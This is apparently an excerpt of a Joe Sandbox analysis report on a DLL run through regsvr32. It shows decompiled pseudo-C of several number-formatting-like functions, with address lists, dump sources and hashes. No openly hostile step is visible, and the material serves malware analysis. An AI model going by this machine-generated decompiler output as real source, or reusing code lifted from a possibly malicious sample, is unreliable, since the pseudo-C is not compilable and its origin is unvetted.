                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t161;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001cb97;
                                                                      				if (_t109 == 0) goto 0x8001cb11;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001cbeb;
                                                                      				if (_t110 == 0) goto 0x8001cb67;
                                                                      				if (_t110 == 0) goto 0x8001cb38;
                                                                      				if (_t110 == 0) goto 0x8001cbeb;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001cbb7;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cc14;
                                                                      				E00000001180025BA8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001cc19;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cb5d;
                                                                      				_t70 = E0000000118002578C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001cc19;
                                                                      				E00000001180025894(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001cc19;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001cb8d;
                                                                      				_t74 = E0000000118002557C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001cc19;
                                                                      				E00000001180025684(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001cc19;
                                                                      				if (_t114 == 0) goto 0x8001cb11;
                                                                      				if (_t114 == 0) goto 0x8001cb11;
                                                                      				if (_t114 == 0) goto 0x8001cb11;
                                                                      				goto 0x8001caff;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001ccc9;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001cc0d;
                                                                      				_t80 = E0000000118002599C( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001cc19;
                                                                      				_t81 = E00000001180025AA4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001cc19;
                                                                      				E00000001180025CB0(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001cbe4;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001cc33;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001ccc7;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001cc51;
                                                                      				if (_t152 >= 0) goto 0x8001cc51;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001cc60;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001cc77;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				_t48 = _t131 + 0x50; // 0x91
                                                                      				E0000000118001A174(_t131, _t48,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001cc80;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t161 != _t161) goto 0x8001cc99;
                                                                      				E00000001180025ED0(0, _t131, _t153);
                                                                      				goto 0x8001cca0;
                                                                      				E00000001180025F4C(__esi, _t131);
                                                                      				if (0 == 0) goto 0x8001ccc7;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001ccb9;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001ccc7;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001cab8
                                                                      0x18001cabd
                                                                      0x18001cac2
                                                                      0x18001cad3
                                                                      0x18001cad6
                                                                      0x18001cad9
                                                                      0x18001cadc
                                                                      0x18001cae2
                                                                      0x18001cae5
                                                                      0x18001caeb
                                                                      0x18001caed
                                                                      0x18001caef
                                                                      0x18001caf8
                                                                      0x18001cafd
                                                                      0x18001cb02
                                                                      0x18001cb0b
                                                                      0x18001cb18
                                                                      0x18001cb28
                                                                      0x18001cb2e
                                                                      0x18001cb33
                                                                      0x18001cb3f
                                                                      0x18001cb51
                                                                      0x18001cb53
                                                                      0x18001cb58
                                                                      0x18001cb5d
                                                                      0x18001cb62
                                                                      0x18001cb6e
                                                                      0x18001cb7e
                                                                      0x18001cb81
                                                                      0x18001cb83
                                                                      0x18001cb88
                                                                      0x18001cb8d
                                                                      0x18001cb92
                                                                      0x18001cb9a
                                                                      0x18001cba3
                                                                      0x18001cbac
                                                                      0x18001cbb2
                                                                      0x18001cbb7
                                                                      0x18001cbbb
                                                                      0x18001cbbe
                                                                      0x18001cbc5
                                                                      0x18001cbc9
                                                                      0x18001cbd4
                                                                      0x18001cbd9
                                                                      0x18001cbdf
                                                                      0x18001cbe6
                                                                      0x18001cbf2
                                                                      0x18001cc04
                                                                      0x18001cc06
                                                                      0x18001cc0b
                                                                      0x18001cc0d
                                                                      0x18001cc12
                                                                      0x18001cc14
                                                                      0x18001cc1b
                                                                      0x18001cc24
                                                                      0x18001cc2d
                                                                      0x18001cc38
                                                                      0x18001cc41
                                                                      0x18001cc46
                                                                      0x18001cc48
                                                                      0x18001cc4b
                                                                      0x18001cc4e
                                                                      0x18001cc55
                                                                      0x18001cc57
                                                                      0x18001cc5e
                                                                      0x18001cc6b
                                                                      0x18001cc6e
                                                                      0x18001cc72
                                                                      0x18001cc7a
                                                                      0x18001cc7c
                                                                      0x18001cc80
                                                                      0x18001cc84
                                                                      0x18001cc8d
                                                                      0x18001cc92
                                                                      0x18001cc97
                                                                      0x18001cc9b
                                                                      0x18001cca8
                                                                      0x18001ccae
                                                                      0x18001ccb7
                                                                      0x18001ccb9
                                                                      0x18001ccc1
                                                                      0x18001ccc4
                                                                      0x18001cce1

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df0b1a9947acc2782fe305f60bd06af944961edbd594b91319f15471c5b4d9c8
                                                                      • Instruction ID: 2f59bdd704fb2cc9959ba46d21df96d0bdd9a3b6848a47900a63578af42329e0
                                                                      • Opcode Fuzzy Hash: df0b1a9947acc2782fe305f60bd06af944961edbd594b91319f15471c5b4d9c8
                                                                      • Instruction Fuzzy Hash: 6B51B872104A4886FBA78F25C0557ED27A0E70DBDCF198215FA494B789CF35CA49C78A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001AB44(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t161;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001ac23;
                                                                      				if (_t109 == 0) goto 0x8001ab9d;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001ac77;
                                                                      				if (_t110 == 0) goto 0x8001abf3;
                                                                      				if (_t110 == 0) goto 0x8001abc4;
                                                                      				if (_t110 == 0) goto 0x8001ac77;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001ac43;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001aca0;
                                                                      				E00000001180023AF8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001aca5;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001abe9;
                                                                      				_t70 = E000000011800236DC( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001aca5;
                                                                      				E000000011800237E4(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001aca5;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001ac19;
                                                                      				_t74 = E000000011800234CC( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001aca5;
                                                                      				E000000011800235D4(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001aca5;
                                                                      				if (_t114 == 0) goto 0x8001ab9d;
                                                                      				if (_t114 == 0) goto 0x8001ab9d;
                                                                      				if (_t114 == 0) goto 0x8001ab9d;
                                                                      				goto 0x8001ab8b;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001ad55;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001ac99;
                                                                      				_t80 = E000000011800238EC( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001aca5;
                                                                      				_t81 = E000000011800239F4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001aca5;
                                                                      				E00000001180023C00(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001ac70;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001acbf;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001ad53;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001acdd;
                                                                      				if (_t152 >= 0) goto 0x8001acdd;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001acec;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001ad03;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				E0000000118001A174(_t131, _t131 + 0x50,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001ad0c;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t161 != _t161) goto 0x8001ad25;
                                                                      				E00000001180023F18(_t131, _t153);
                                                                      				goto 0x8001ad2c;
                                                                      				E00000001180023FC4(__esi, _t131, _t153);
                                                                      				if (0 == 0) goto 0x8001ad53;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001ad45;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001ad53;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001ab44
                                                                      0x18001ab49
                                                                      0x18001ab4e
                                                                      0x18001ab5f
                                                                      0x18001ab62
                                                                      0x18001ab65
                                                                      0x18001ab68
                                                                      0x18001ab6e
                                                                      0x18001ab71
                                                                      0x18001ab77
                                                                      0x18001ab79
                                                                      0x18001ab7b
                                                                      0x18001ab84
                                                                      0x18001ab89
                                                                      0x18001ab8e
                                                                      0x18001ab97
                                                                      0x18001aba4
                                                                      0x18001abb4
                                                                      0x18001abba
                                                                      0x18001abbf
                                                                      0x18001abcb
                                                                      0x18001abdd
                                                                      0x18001abdf
                                                                      0x18001abe4
                                                                      0x18001abe9
                                                                      0x18001abee
                                                                      0x18001abfa
                                                                      0x18001ac0a
                                                                      0x18001ac0d
                                                                      0x18001ac0f
                                                                      0x18001ac14
                                                                      0x18001ac19
                                                                      0x18001ac1e
                                                                      0x18001ac26
                                                                      0x18001ac2f
                                                                      0x18001ac38
                                                                      0x18001ac3e
                                                                      0x18001ac43
                                                                      0x18001ac47
                                                                      0x18001ac4a
                                                                      0x18001ac51
                                                                      0x18001ac55
                                                                      0x18001ac60
                                                                      0x18001ac65
                                                                      0x18001ac6b
                                                                      0x18001ac72
                                                                      0x18001ac7e
                                                                      0x18001ac90
                                                                      0x18001ac92
                                                                      0x18001ac97
                                                                      0x18001ac99
                                                                      0x18001ac9e
                                                                      0x18001aca0
                                                                      0x18001aca7
                                                                      0x18001acb0
                                                                      0x18001acb9
                                                                      0x18001acc4
                                                                      0x18001accd
                                                                      0x18001acd2
                                                                      0x18001acd4
                                                                      0x18001acd7
                                                                      0x18001acda
                                                                      0x18001ace1
                                                                      0x18001ace3
                                                                      0x18001acea
                                                                      0x18001acf7
                                                                      0x18001acfe
                                                                      0x18001ad06
                                                                      0x18001ad08
                                                                      0x18001ad0c
                                                                      0x18001ad10
                                                                      0x18001ad19
                                                                      0x18001ad1e
                                                                      0x18001ad23
                                                                      0x18001ad27
                                                                      0x18001ad34
                                                                      0x18001ad3a
                                                                      0x18001ad43
                                                                      0x18001ad45
                                                                      0x18001ad4d
                                                                      0x18001ad50
                                                                      0x18001ad6d

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a23768f7c95c261cfb0cecf52ff148ebe8a5644f4cbece8c8c3ef9c04e895468
                                                                      • Instruction ID: e267a46481ae90f80624f9b5e1f31f6603c0fe238b3f717e9b17b8fb63ae847e
                                                                      • Opcode Fuzzy Hash: a23768f7c95c261cfb0cecf52ff148ebe8a5644f4cbece8c8c3ef9c04e895468
                                                                      • Instruction Fuzzy Hash: 00518372108E8C87F7A78E39D0553E937A0E74E7DCF158215FA4A0BA99CF25CA49C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001CCE4(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t161;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001cdc3;
                                                                      				if (_t109 == 0) goto 0x8001cd3d;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001ce17;
                                                                      				if (_t110 == 0) goto 0x8001cd93;
                                                                      				if (_t110 == 0) goto 0x8001cd64;
                                                                      				if (_t110 == 0) goto 0x8001ce17;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001cde3;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001ce40;
                                                                      				E00000001180025BA8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ce45;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cd89;
                                                                      				_t70 = E0000000118002578C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ce45;
                                                                      				E00000001180025894(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001ce45;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001cdb9;
                                                                      				_t74 = E0000000118002557C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ce45;
                                                                      				E00000001180025684(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001ce45;
                                                                      				if (_t114 == 0) goto 0x8001cd3d;
                                                                      				if (_t114 == 0) goto 0x8001cd3d;
                                                                      				if (_t114 == 0) goto 0x8001cd3d;
                                                                      				goto 0x8001cd2b;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001cef5;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001ce39;
                                                                      				_t80 = E0000000118002599C( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001ce45;
                                                                      				_t81 = E00000001180025AA4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001ce45;
                                                                      				E00000001180025CB0(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001ce10;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001ce5f;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001cef3;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001ce7d;
                                                                      				if (_t152 >= 0) goto 0x8001ce7d;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001ce8c;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001cea3;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				E0000000118001A174(_t131, _t131 + 0x50,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001ceac;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t161 != _t161) goto 0x8001cec5;
                                                                      				E00000001180025FC8(_t131, _t153);
                                                                      				goto 0x8001cecc;
                                                                      				E00000001180026074(__esi, _t131, _t153);
                                                                      				if (0 == 0) goto 0x8001cef3;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001cee5;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001cef3;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001cce4
                                                                      0x18001cce9
                                                                      0x18001ccee
                                                                      0x18001ccff
                                                                      0x18001cd02
                                                                      0x18001cd05
                                                                      0x18001cd08
                                                                      0x18001cd0e
                                                                      0x18001cd11
                                                                      0x18001cd17
                                                                      0x18001cd19
                                                                      0x18001cd1b
                                                                      0x18001cd24
                                                                      0x18001cd29
                                                                      0x18001cd2e
                                                                      0x18001cd37
                                                                      0x18001cd44
                                                                      0x18001cd54
                                                                      0x18001cd5a
                                                                      0x18001cd5f
                                                                      0x18001cd6b
                                                                      0x18001cd7d
                                                                      0x18001cd7f
                                                                      0x18001cd84
                                                                      0x18001cd89
                                                                      0x18001cd8e
                                                                      0x18001cd9a
                                                                      0x18001cdaa
                                                                      0x18001cdad
                                                                      0x18001cdaf
                                                                      0x18001cdb4
                                                                      0x18001cdb9
                                                                      0x18001cdbe
                                                                      0x18001cdc6
                                                                      0x18001cdcf
                                                                      0x18001cdd8
                                                                      0x18001cdde
                                                                      0x18001cde3
                                                                      0x18001cde7
                                                                      0x18001cdea
                                                                      0x18001cdf1
                                                                      0x18001cdf5
                                                                      0x18001ce00
                                                                      0x18001ce05
                                                                      0x18001ce0b
                                                                      0x18001ce12
                                                                      0x18001ce1e
                                                                      0x18001ce30
                                                                      0x18001ce32
                                                                      0x18001ce37
                                                                      0x18001ce39
                                                                      0x18001ce3e
                                                                      0x18001ce40
                                                                      0x18001ce47
                                                                      0x18001ce50
                                                                      0x18001ce59
                                                                      0x18001ce64
                                                                      0x18001ce6d
                                                                      0x18001ce72
                                                                      0x18001ce74
                                                                      0x18001ce77
                                                                      0x18001ce7a
                                                                      0x18001ce81
                                                                      0x18001ce83
                                                                      0x18001ce8a
                                                                      0x18001ce97
                                                                      0x18001ce9e
                                                                      0x18001cea6
                                                                      0x18001cea8
                                                                      0x18001ceac
                                                                      0x18001ceb0
                                                                      0x18001ceb9
                                                                      0x18001cebe
                                                                      0x18001cec3
                                                                      0x18001cec7
                                                                      0x18001ced4
                                                                      0x18001ceda
                                                                      0x18001cee3
                                                                      0x18001cee5
                                                                      0x18001ceed
                                                                      0x18001cef0
                                                                      0x18001cf0d

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 84ca64d687bd453d018440b54ea10d348c4c68ce95160059b51052aabbc36e60
                                                                      • Instruction ID: 916b4fef26ef5f700ac08ff47c4fe0791a371c6445b6651b31a83a3a3571840d
                                                                      • Opcode Fuzzy Hash: 84ca64d687bd453d018440b54ea10d348c4c68ce95160059b51052aabbc36e60
                                                                      • Instruction Fuzzy Hash: 9551A672114A8886F7EB8F28C0147EC27A0F70DBDCF159215FA450BA99CF35CA49C74A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d83198b96b735bb3d577bb345218927d976f7c5abdbe7d26c80a71a0739ae99c
                                                                      • Instruction ID: 6d8fd54fa56d06d2d8570910a446578c0480d6c43eb8e764c91e20687fa4d069
                                                                      • Opcode Fuzzy Hash: d83198b96b735bb3d577bb345218927d976f7c5abdbe7d26c80a71a0739ae99c
                                                                      • Instruction Fuzzy Hash: 68513BB490870C9BCF68DFA8D5995EDBBB2FB48344F00412ED80AB7290D7749919CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118001E038(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
